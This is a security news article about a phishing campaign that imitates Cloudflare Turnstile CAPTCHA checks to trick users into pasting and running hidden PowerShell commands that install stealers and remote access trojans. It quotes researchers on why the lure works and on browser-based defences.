New phishing campaign hijacks clipboard via fake CAPTCHA for malware delivery

A new wave of browser-based phishing tricks unsuspecting users into copy-pasting malicious commands into their systems, all while believing they’re completing a legitimate CAPTCHA verification.

According to a SlashNext research, attackers have been found cloning the Cloudflare Turnstile interface, a privacy-preserving CAPTCHA alternative to verify if a user is human, to lure users into executing a malware.

Commenting on why this is an absolute winner for the threat actors, Lionel Litty, chief security architect at Menlo Security, said, “These social engineering attacks are often successful because they astutely tap into users’ frustration: having to solve yet another CAPTCHA.” They then go on to provide instructions that are both obscure for many users and easy to follow, Litty added.

In SlashNext observations, Victims were presented with a fake security check with real-looking branding and a Ray ID, a Cloudflare-assigned identifier. After clicking “Verify you are human,” users are guided through key presses that unknowingly paste and run a hidden PowerShell command copied to their clipboard.

These ClickFix campaigns (including the one using TurnStile CACHE) were used to deliver a range of payloads, including information stealers such as Lumma and Stealc, as well as full-fledged remote access trojans (RATs) like NetSupport Manager designed for full system compromise.

Fake Captcha used as new phishing frontier

SlashNext researcher Daniel Kelley warned that the observed campaign signals threat actors moving from traditional phishing that involves direct prompting of a file download, to a more sophisticated ClickFix attack that looks like a legitimate security check.

The attack begins through compromised websites containing malicious JavaScript. When users interact with these sites, they’re redirected to deceptive pages that display error messages or CAPTCHA verifications, urging users to perform actions such as copying and pasting commands into their system’s terminal or PowerShell.

“When a victim visits a malicious or compromised site, they see a message ‘Checking if the site connection is secure-Verify you are human’ just as they would on a real Cloudflare page,” Kelley said in a blog post. Subsequently, a pop-up or on-page message directs users through a sequence of key presses — including Win+R, Ctrl+V, and Enter — resulting in execution of the malware on their machine.

“The concept of phishing users with fake security controls is not a new one,” said James Maude, field CTO at BeyondTrust. “In the past, threat actors have had great success with phishing documents that trick users into allowing malicious macros to run using fake security checks that claim the document needs macros enabled for security.”

As defences have evolved and gotten better at blocking phishing email attachments that launch malicious code, threat actors have evolved their techniques, too, to find more creative ways to manipulate users into executing code, Maude noted.

Fail-proof exploit of ‘verification fatigue’

SlashNext highlighted that the campaign’s success stems largely from its exploitation of human psychology.

“Modern internet users are inundated with spam checks, CAPTCHAs, and security prompts on websites, and they’ve been conditioned to click through these as quickly as possible,” Kelley added. “Attackers exploit this ‘verification fatigue,’ knowing that many users will comply with whatever steps are presented if it looks routine.”

The absence of immediate red flags like suspicious downloads, added with deceptive design using trusted branding and interface, provides a false sense of security.

“We have seen an increasing number of this type of attack over the past several months and have had multiple customers inquire about possible ways to hinder the attack,” Litty said. “Because of their limited visibility into browser behavior, AV products and other endpoint protection solutions tend to miss these attacks.”

Litty noted a need for browser-specific solutions, including tools for browser isolation, that can detect a website that writes content into the clipboard and flag it to users.

ClickFix tactics aren’t anything new and have been picked up in recent years by nation-state actors, most notably in the “Contagious Interviews” campaign linked to the North Korea-aligned Kimsuky group. Other notable state-sponsored actors known for using ClickFix include MuddyWater(Iran), APT28 and UNK_RemoteRogue(Russia).